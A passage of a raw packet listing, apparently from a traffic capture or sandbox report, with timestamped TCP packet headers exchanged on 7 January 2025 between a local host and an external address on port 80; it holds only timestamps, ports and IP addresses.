Jan 7, 2025 10:09:03.711513996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711532116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711532116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711544991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711554050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711555004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711566925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711577892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711585045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711592913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711618900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711618900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711632967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711644888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711656094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711659908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711673021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711702108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711770058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711810112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711826086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711837053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711853981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711867094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711877108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711879015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711879015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711889029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711900949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711911917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711918116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711918116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711924076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.711962938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.711987972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712011099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712028027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712039948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712044954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712066889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712079048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712085962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712085962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712091923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712114096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712125063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712131977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712132931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712157011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712169886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712182045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712184906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712193966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712217093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712235928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712239981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712251902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712264061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712275982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712291956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712304115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712304115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712320089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712337971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712338924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712352037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712363958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712392092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712392092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712420940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712457895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712469101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712479115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.712515116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.712515116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.738178968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738189936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738200903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738245964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738245964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.738260031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738285065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.738315105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.738416910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738429070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738447905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738461018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738462925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.738480091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738486052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738501072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738512993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738523960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738534927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.738539934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.738584042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.738584042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.740659952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740670919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740686893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740699053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740716934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740729094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740737915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.740740061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740756989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.740756989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740767956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.740799904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.740822077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.740858078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.762784004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762797117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762809038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762841940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762847900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.762857914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762871027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762876034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.762911081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762926102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.762927055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.762976885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795588017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795605898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795618057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795628071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795650005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795655966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795665979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795679092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795687914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795697927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795701027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795711994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795723915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795733929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795754910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795754910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795800924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795830011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795841932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795854092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795866013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795903921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795903921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.795923948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795939922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795953035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795965910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.795974970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796006918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796026945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796041012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796053886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796066999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796073914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796078920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796116114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796148062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796152115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796164989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796176910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796189070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796209097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796235085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796238899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796253920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796264887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796304941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796313047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796339035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796353102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796364069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796392918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796405077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796417952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796423912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796427965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796428919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.796427965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796484947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.796484947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798130035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798141956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798161030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798171997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798187017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798188925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798203945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798214912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798227072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798227072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798227072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798263073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798275948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798281908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798281908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798281908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798299074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798314095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798322916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798381090 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798389912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798401117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798417091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798446894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798481941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798563957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798582077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798588991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798593998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798614979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798626900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798639059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798644066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798650026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798662901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798664093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798683882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798683882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798696041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798706055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798710108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798713923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798722982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798752069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798758030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798768044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798772097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798801899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798808098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798818111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798829079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798835993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798846006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798858881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798868895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798875093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798892021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798903942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798923016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798933983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798947096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798948050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798948050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798959017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.798974037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.798996925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.799019098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.799019098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799032927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799043894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799057007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799074888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799092054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799103975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799104929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.799104929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.799115896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799120903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.799129009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.799156904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.799179077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825093031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825104952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825118065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825129986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825197935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825197935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825197935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825211048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825225115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825237036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825249910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825256109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825304985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825304985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825337887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825351000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825361967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825375080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825387001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.825403929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825403929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.825432062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.827444077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827455997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827466965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827497959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.827532053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827533007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.827543974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827555895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827569008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827604055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.827614069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.827639103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.827682972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.849550962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849562883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849572897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849608898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849617958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.849626064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849657059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.849673986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.849704027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.849714994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849731922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849744081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.849780083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.849780083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.849796057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882317066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882349968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882361889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882397890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882406950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882419109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882447004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882457972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882478952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882491112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882500887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882538080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882538080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882572889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882591009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882630110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882631063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882642031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882671118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882688046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882689953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882699966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882711887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882724047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882735014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882760048 CET	80	50017	31.41.244.11	192.168.2.4
